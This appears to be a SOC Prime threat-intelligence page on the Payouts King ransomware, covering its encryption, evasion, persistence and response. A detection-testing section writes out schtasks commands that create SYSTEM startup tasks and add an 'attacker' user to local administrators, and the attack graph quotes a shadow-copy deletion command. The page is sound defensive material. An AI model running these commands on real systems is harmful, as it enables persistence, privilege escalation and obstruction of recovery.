SOC Prime Bias: High

17 Apr 2026 17:40
newspaper icon ThreatLabz Ransomware Report

Payouts King Takes Aim at the Ransomware Throne

Author Photo
SOC Prime Team linkedin icon Follow
Payouts King Takes Aim at the Ransomware Throne
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Investigation

ThreatLabz analyzed multiple ransomware samples, reversing the custom CRC and FNV1 hash functions used by the malware and identifying persistence through scheduled tasks. Researchers also documented the encryption scheme, targeted file extensions, and the overall execution flow. Their analysis revealed a built-in list of security-related processes that the ransomware attempts to terminate using low-level system calls before encryption begins. Additional indicators, including command-line parameters and file-extension patterns, were extracted directly from the samples to support detection and hunting efforts.

Mitigation

Organizations should enforce multi-factor authentication, train users to recognize social engineering attempts, and monitor for suspicious use of tools such as Microsoft Teams and Quick Assist. Defenders should also block known ransomware-related file extensions and deploy endpoint detections capable of identifying scheduled task creation under the Mozilla path, as well as calls to SetFileInformationByHandle with FileRenameInfo. Offline backups should be maintained regularly, and shadow copies should be protected to improve recovery options in the event of encryption.

Response

If Payouts King activity is detected, isolate the affected system immediately and collect both volatile memory and disk images for forensic analysis. Investigators should review scheduled tasks for names such as MozillaUpdateTask and MozillaElevateTask, then hunt for the custom CRC-protected command-line arguments and the unique encrypted-file extensions associated with the malware. Recovery should focus on restoring data from verified clean backups. Security teams should also submit the identified sample hashes to relevant threat intelligence platforms to support broader tracking and defense.

"graph TB %% Class definitions classDef action fill:#99ccff classDef process fill:#ffcc99 classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef credential fill:#ffccff classDef operator fill:#ff9900 %% Nodes action_phishing["<b>Action</b> – <b>T1566.001 Phishing: Spearphishing Attachment</b><br/><b>Description</b>: Email with malicious attachment impersonating IT staff, may use Teams or Quick Assist to convince victim to run file.<br/><b>Technique ID</b>: T1566.001"] class action_phishing action action_user_exec["<b>Action</b> – <b>T1204.002 User Execution</b><br/><b>Description</b>: Victim opens the malicious file, launching ransomware binary.<br/><b>Technique ID</b>: T1204.002"] class action_user_exec action tool_malicious_file["<b>Tool</b> – <b>Name</b>: Malicious Payload File<br/><b>Description</b>: Executable delivered via phishing attachment.<br/><b>File Type</b>: .exe or script"] class tool_malicious_file tool process_cmd_shell["<b>Process</b> – <b>T1059.003 Windows Command Shell</b><br/><b>Description</b>: Ransomware spawns cmd.exe processes via pipe redirection to issue system commands.<br/><b>Technique ID</b>: T1059.003"] class process_cmd_shell process action_scheduled_task["<b>Action</b> – <b>T1053 Scheduled Task</b><br/><b>Description</b>: Creates a task (e.g., \Mozilla\UpdateTask) to run at system start for persistence.<br/><b>Technique ID</b>: T1053"] class action_scheduled_task action action_elevate_task["<b>Action</b> – <b>T1546 Event Triggered Execution</b><br/><b>Description</b>: Creates second task (\Mozilla\ElevateTask) that runs ransomware as SYSTEM.<br/><b>Technique ID</b>: T1546"] class action_elevate_task action defense_obfuscation_dynapi["<b>Defense Evasion</b> – <b>T1027.007 Dynamic API Resolution</b><br/><b>Description</b>: Hashes API names with custom CRC/FNV1 and resolves at runtime.<br/><b>Technique ID</b>: T1027.007"] class defense_obfuscation_dynapi malware defense_evasion_process_kill["<b>Defense Evasion</b> – <b>T1564.011 Ignore Process Interrupts</b><br/><b>Description</b>: Terminates AV/security processes using direct system calls to bypass hooking.<br/><b>Technique ID</b>: T1564.011"] class defense_evasion_process_kill malware defense_obfuscation_general["<b>Defense Evasion</b> – <b>T1027 Obfuscated Files or Information</b><br/><b>Description</b>: Uses stacku2011based string construction and encrypted sections to hide code.<br/><b>Technique ID</b>: T1027"] class defense_obfuscation_general malware impact_encrypt_files["<b>Impact</b> – <b>T1560.003 Archive via Custom Method</b><br/><b>Description</b>: Encrypts files with peru2011file AESu2011256u2011CTR keys protected by RSAu20114096; may encrypt selectively based on size.<br/><b>Technique ID</b>: T1560.003"] class impact_encrypt_files malware impact_delete_shadows["<b>Impact</b> – <b>T1006 Direct Volume Access</b><br/><b>Description</b>: Executes vssadmin.exe delete shadows /all /quiet to remove volume shadow copies.<br/><b>Technique ID</b>: T1006"] class impact_delete_shadows malware impact_clear_logs["<b>Impact</b> – <b>T1070.001 Clear Windows Event Logs</b><br/><b>Description</b>: Calls EvtClearLog API to erase event log entries.<br/><b>Technique ID</b>: T1070.001"] class impact_clear_logs malware credential_private_key["<b>Credential Access</b> – <b>T1552.004 Private Keys</b><br/><b>Description</b>: Embedded RSA private key encrypts AES key material for each encrypted file.<br/><b>Technique ID</b>: T1552.004"] class credential_private_key credential %% Connections action_phishing –>|leads to| action_user_exec action_user_exec –>|executes| tool_malicious_file tool_malicious_file –>|spawns| process_cmd_shell process_cmd_shell –>|creates| action_scheduled_task action_scheduled_task –>|creates| action_elevate_task action_elevate_task –>|enables| defense_obfuscation_dynapi action_elevate_task –>|enables| defense_evasion_process_kill action_elevate_task –>|enables| defense_obfuscation_general defense_obfuscation_dynapi –>|supports| impact_encrypt_files defense_evasion_process_kill –>|supports| impact_encrypt_files defense_obfuscation_general –>|supports| impact_encrypt_files impact_encrypt_files –>|uses| credential_private_key impact_encrypt_files –>|causes| impact_delete_shadows impact_encrypt_files –>|causes| impact_clear_logs "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:

    The attacker, having gained initial access, wants to ensure the ransomware runs on every system reboot and gains SYSTEM privileges. They use the native schtasks.exe binary to avoid introducing third‑party tools. First, they create a “UpdateTask” that runs a dummy ransomware payload, then immediately create and run an “ElevateTask” that spawns a privileged process to further the infection chain. Both tasks are placed under the Mozilla namespace to mimic the known Payouts King pattern.

    1. Create UpdateTask:

      schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaUpdateTask /TR "cmd.exe /c start C:Temppayouts_king.exe"

    2. Create ElevateTask:

      schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaElevateTask /TR "cmd.exe /c whoami && net localgroup administrators /add attacker"

    3. Execute ElevateTask immediately:

      schtasks.exe /run /tn MozillaElevateTask

    4. (Optional) Verify tasks exist:

      schtasks.exe /query /tn Mozilla* /fo LIST /v

    These exact command lines match the selection1 and selection2 clauses of the Sigma rule, satisfying the condition: selection1 and selection2 and not exclusion.

  • Regression Test Script:

    # Payouts King Scheduled‑Task Persistence Simulation
# -------------------------------------------------
# Step 1: Create the UpdateTask (persistence on boot)
schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaUpdateTask /TR "cmd.exe /c start C:Temppayouts_king.exe"

# Step 2: Create the ElevateTask (privilege escalation helper)
schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaElevateTask /TR "cmd.exe /c whoami && net localgroup administrators /add attacker"

# Step 3: Run the ElevateTask immediately to generate the second detection event
schtasks.exe /run /tn MozillaElevateTask

# Step 4: Output confirmation (not required for detection, for operator visibility)
Write-Host "Scheduled tasks created and ElevateTask executed."

  • Cleanup Commands:

    # Remove the tasks created for the test
schtasks.exe /delete /tn MozillaElevateTask /f
schtasks.exe /delete /tn MozillaUpdateTask /f

# Optionally delete the dummy payload
Remove-Item -Path "C:Temppayouts_king.exe" -ErrorAction SilentlyContinue

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free